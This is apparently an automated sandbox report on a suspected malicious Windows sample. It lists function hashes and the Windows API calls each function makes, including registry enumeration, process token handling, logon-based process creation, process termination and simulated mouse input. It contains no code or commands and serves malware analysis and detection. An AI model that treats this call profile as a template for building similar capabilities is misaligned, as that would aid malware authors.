                                                                                                                                                                            • Opcode ID: 90e4270b8b646b14ad7f8278f0e71b6f76be5bb1b7a18cc9afe12dd73596309f
                                                                                                                                                                            • Instruction ID: 74b1fac44e580df579304cf5832613d526cc93ba4d5b3ded2b3cc1180920da24
                                                                                                                                                                            • Opcode Fuzzy Hash: 90e4270b8b646b14ad7f8278f0e71b6f76be5bb1b7a18cc9afe12dd73596309f
                                                                                                                                                                            • Instruction Fuzzy Hash: 94618D7450025A9BCF11EF21CC81FFE37A8AF0570CF05851EF9555B292EA78AC46CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0548
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004E0588
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004E05AB
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004E05D4
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004E0617
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E0624
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4046560759-0
                                                                                                                                                                            • Opcode ID: b7baac0ddeb20e428c4020e79fcab3829617cfcb5a65bfdc5382e9de6ede1c1b
                                                                                                                                                                            • Instruction ID: 6c32bda3a77a21d52f2c60a76472f640b8f6947adbe0ddd772307b47b0cc5177
                                                                                                                                                                            • Opcode Fuzzy Hash: b7baac0ddeb20e428c4020e79fcab3829617cfcb5a65bfdc5382e9de6ede1c1b
                                                                                                                                                                            • Instruction Fuzzy Hash: 65517D31108240AFC710EF65C885E6FBBE8FF85318F04491EF595872A2DB79E945CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004BF3F7
                                                                                                                                                                            • VariantClear.OLEAUT32(00000013), ref: 004BF469
                                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 004BF4C4
                                                                                                                                                                            • _memmove.LIBCMT ref: 004BF4EE
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004BF53B
                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004BF569
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1101466143-0
                                                                                                                                                                            • Opcode ID: 014e42564de3ebc491698fc2c0630d28effd7363326c760634992100fcaa655c
                                                                                                                                                                            • Instruction ID: ad59f7ab5d3e05a6c07833a6a30856b5ab523030e90e74c9b368e27cbe46780b
                                                                                                                                                                            • Opcode Fuzzy Hash: 014e42564de3ebc491698fc2c0630d28effd7363326c760634992100fcaa655c
                                                                                                                                                                            • Instruction Fuzzy Hash: 91516AB5A00209EFCB10CF58D880EAAB7B8FF4C314B15856AE959DB351D734E916CFA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004C2747
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C2792
                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 004C27B2
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004C27E6
                                                                                                                                                                            • GetMenuItemCount.USER32(000000FF), ref: 004C2844
                                                                                                                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004C2875
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3311875123-0
                                                                                                                                                                            • Opcode ID: 419e321c12fee826ff1bbf17facac275f786a994546c96080c4403d6708172cc
                                                                                                                                                                            • Instruction ID: b19d7c8d3b9fe884f7b0709700f098317e4dc57c91a672df4fe4b634866e5415
                                                                                                                                                                            • Opcode Fuzzy Hash: 419e321c12fee826ff1bbf17facac275f786a994546c96080c4403d6708172cc
                                                                                                                                                                            • Instruction Fuzzy Hash: F351B278900345EBDF64EF68CA88FAEBBF4AF44314F10466EE4119B291D7F88904CB65
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0046179A
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004617FE
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0046181B
                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0046182C
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00461876
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1827037458-0
                                                                                                                                                                            • Opcode ID: 2c6c242cf6a6f3b3a90825c599a6c9f0089ba8338bfe788d51f429122e18e26e
                                                                                                                                                                            • Instruction ID: 5f926e7b8a66a5f7ed7f0af4c915235bf43ee043affc994e1e79f845515e2a95
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c6c242cf6a6f3b3a90825c599a6c9f0089ba8338bfe788d51f429122e18e26e
                                                                                                                                                                            • Instruction Fuzzy Hash: 69419F70100340AFDB11DF25D884BB67BE8EF56724F08066AF9958B2B2D7349C4ADB66
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(005267B0,00000000,00D355D0,?,?,005267B0,?,004EB862,?,?), ref: 004EB9CC
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004EB9F0
                                                                                                                                                                            • ShowWindow.USER32(005267B0,00000000,00D355D0,?,?,005267B0,?,004EB862,?,?), ref: 004EBA50
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000004,?,004EB862,?,?), ref: 004EBA62
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 004EBA86
                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004EBAA9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                            • Opcode ID: b2d00dc4f1f0a5d768f60ee629d3bea2abf2141b2ce93615f75bad9b4f78c7ab
                                                                                                                                                                            • Instruction ID: 4fb62ab8099a6979fe0d35457ada1b39c40bf7e2ed617b51a09f3d0a9c415951
                                                                                                                                                                            • Opcode Fuzzy Hash: b2d00dc4f1f0a5d768f60ee629d3bea2abf2141b2ce93615f75bad9b4f78c7ab
                                                                                                                                                                            • Instruction Fuzzy Hash: C0415470600181AFDB22CF55C489BA77BE1FB05315F1842BAEA488F3A3C735A845CB95
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,004D5134,?,?,00000000,00000001), ref: 004D73BF
                                                                                                                                                                              • Part of subcall function 004D3C94: GetWindowRect.USER32(?,?), ref: 004D3CA7
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004D73E9
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004D73F0
                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004D7422
                                                                                                                                                                              • Part of subcall function 004C54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C555E
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004D744E
                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004D74AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4137160315-0
                                                                                                                                                                            • Opcode ID: a9ea667b03a4a03db7c3430107128aa45ef55600102d3950c1b135378211344c
                                                                                                                                                                            • Instruction ID: b4d3e710f3e4ac54913f6542d1400dca8b1f1017e7059a73261146677a8bc0eb
                                                                                                                                                                            • Opcode Fuzzy Hash: a9ea667b03a4a03db7c3430107128aa45ef55600102d3950c1b135378211344c
                                                                                                                                                                            • Instruction Fuzzy Hash: 6831F432508345ABC720DF14C849F5BBBA9FF88318F00092EF48897292D674E949CB96
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B8608
                                                                                                                                                                              • Part of subcall function 004B85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B8612
                                                                                                                                                                              • Part of subcall function 004B85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B8621
                                                                                                                                                                              • Part of subcall function 004B85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B8628
                                                                                                                                                                              • Part of subcall function 004B85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B863E
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,004B8977), ref: 004B8DAC
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004B8DB8
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004B8DBF
                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 004B8DD8
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,004B8977), ref: 004B8DEC
                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004B8DF3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                            • Opcode ID: 0b1403cbd20c73dc997feb34eed333ead3a00fd46aeac818b2e954a14200da94
                                                                                                                                                                            • Instruction ID: 7d850d8f73e854d1a5d41ff543dd99d6dbac203e926394322a1d0b90c70f4d09
                                                                                                                                                                            • Opcode Fuzzy Hash: 0b1403cbd20c73dc997feb34eed333ead3a00fd46aeac818b2e954a14200da94
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B119D31500605FBDB109B64CC49BEFB76DEF55316F10442EE84597291CB399904CB68
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004B8B2A
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004B8B31
                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004B8B40
                                                                                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 004B8B4B
                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004B8B7A
                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 004B8B8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 27175c5176e637dbdb5dcfc08814fa5dcb27d525fbaceb4fa912517ea8c2ea40
• Instruction ID: 25c7f5fccfb7ea0e8836cb0d601b3ba9220f62d51b390ca438f5512fa3da728e
• Opcode Fuzzy Hash: 27175c5176e637dbdb5dcfc08814fa5dcb27d525fbaceb4fa912517ea8c2ea40
• Instruction Fuzzy Hash: D2116AB2504249ABDB018FA4EC49FDA7BADEF08304F044069FE04A6161C776AE64DB64
APIs
  • Part of subcall function 004612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0046134D
  • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046135C
  • Part of subcall function 004612F3: BeginPath.GDI32(?), ref: 00461373
  • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046139C
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 004EC1C4
• LineTo.GDI32(00000000,00000003,?), ref: 004EC1D8
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004EC1E6
• LineTo.GDI32(00000000,00000000,?), ref: 004EC1F6
• EndPath.GDI32(00000000), ref: 004EC206
• StrokePath.GDI32(00000000), ref: 004EC216
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 8baecc086fd684e83e4e5076b9faa16c26c09e9aa77f172e2b630fe7c791dd4c
• Instruction ID: 9c5fa6e999334859bb0e50b90c0d56e1cf496213458f60d1e3c3b89eafd4b852
• Opcode Fuzzy Hash: 8baecc086fd684e83e4e5076b9faa16c26c09e9aa77f172e2b630fe7c791dd4c
• Instruction Fuzzy Hash: 10115B7640014CFFDF119F91DC88EAA7FADEF08354F048066BA084A162D7719E59DBA4
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 004803D3
• MapVirtualKeyW.USER32(00000010,00000000), ref: 004803DB
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004803E6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004803F1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 004803F9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00480401
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 7570b784aab25758a2785a5337e2f044c30568aaff3740cccd182f5fecad3ea0
• Instruction ID: daba059dcaa35dfc0ebdec66b1ec3118a30c389ad9b0e443d6910e4d7dcb5d12
• Opcode Fuzzy Hash: 7570b784aab25758a2785a5337e2f044c30568aaff3740cccd182f5fecad3ea0
• Instruction Fuzzy Hash: 2B016CB09017597DE3008F6A8C85B52FFA8FF19354F00411BA15C4B942C7F5A868CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004C569B
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004C56B1
• GetWindowThreadProcessId.USER32(?,?), ref: 004C56C0
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004C56CF
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004C56D9
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004C56E0
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: d19da38673854dd8109d3dbe188cee50b978ee2148335b854477a45dcc988d39
• Instruction ID: 69dd88ed5da1bd0361cf28ed4d270a5397b3f14a95cedd1eac4642494676c9bd
• Opcode Fuzzy Hash: d19da38673854dd8109d3dbe188cee50b978ee2148335b854477a45dcc988d39
• Instruction Fuzzy Hash: D4F03631641598BBD7215B62DC4DEEF7B7CEFC6B11F000179F904D5091D7A11E0586B9
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 004C74E5
• EnterCriticalSection.KERNEL32(?,?,00471044,?,?), ref: 004C74F6
• TerminateThread.KERNEL32(00000000,000001F6,?,00471044,?,?), ref: 004C7503
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00471044,?,?), ref: 004C7510
  • Part of subcall function 004C6ED7: CloseHandle.KERNEL32(00000000,?,004C751D,?,00471044,?,?), ref: 004C6EE1
• InterlockedExchange.KERNEL32(?,000001F6), ref: 004C7523
• LeaveCriticalSection.KERNEL32(?,?,00471044,?,?), ref: 004C752A
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: f7f9225bc334aeefd5893ebf3ec6b26550ae4d44040a146374a8aef32fe64932
• Instruction ID: 6b0c61bba326678ec612dcf414848f103aec659bb9d68a7462aeb8483f5e0311
• Opcode Fuzzy Hash: f7f9225bc334aeefd5893ebf3ec6b26550ae4d44040a146374a8aef32fe64932
• Instruction Fuzzy Hash: C4F0BE3A440A12EBDB111B24FCCCEEB772AEF04302B010576F202980B2CB761904CB58
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 004B8E7F
• UnloadUserProfile.USERENV(?,?), ref: 004B8E8B
• CloseHandle.KERNEL32(?), ref: 004B8E94
• CloseHandle.KERNEL32(?), ref: 004B8E9C
• GetProcessHeap.KERNEL32(00000000,?), ref: 004B8EA5
• HeapFree.KERNEL32(00000000), ref: 004B8EAC
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                            • Opcode ID: 3975e78c48ebe4c9a3192dbfbbcb435ae4b9d2c1a2acce8963ee7aefa5b1233a
                                                                                                                                                                            • Instruction ID: 9c0ff80119127fed19c8088554eb1cb889b0a511e99725226a6eb55f35f3c69c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3975e78c48ebe4c9a3192dbfbbcb435ae4b9d2c1a2acce8963ee7aefa5b1233a
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DE0C236004445FBDA011FE1EC4C90AFB69FF89322B108630F219890B1CB32A868DB58
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004F2C7C,?), ref: 004B7C32
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004F2C7C,?), ref: 004B7C4A
• CLSIDFromProgID.OLE32(?,?,00000000,004EFB80,000000FF,?,00000000,00000800,00000000,?,004F2C7C,?), ref: 004B7C6F
• _memcmp.LIBCMT ref: 004B7C90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,O
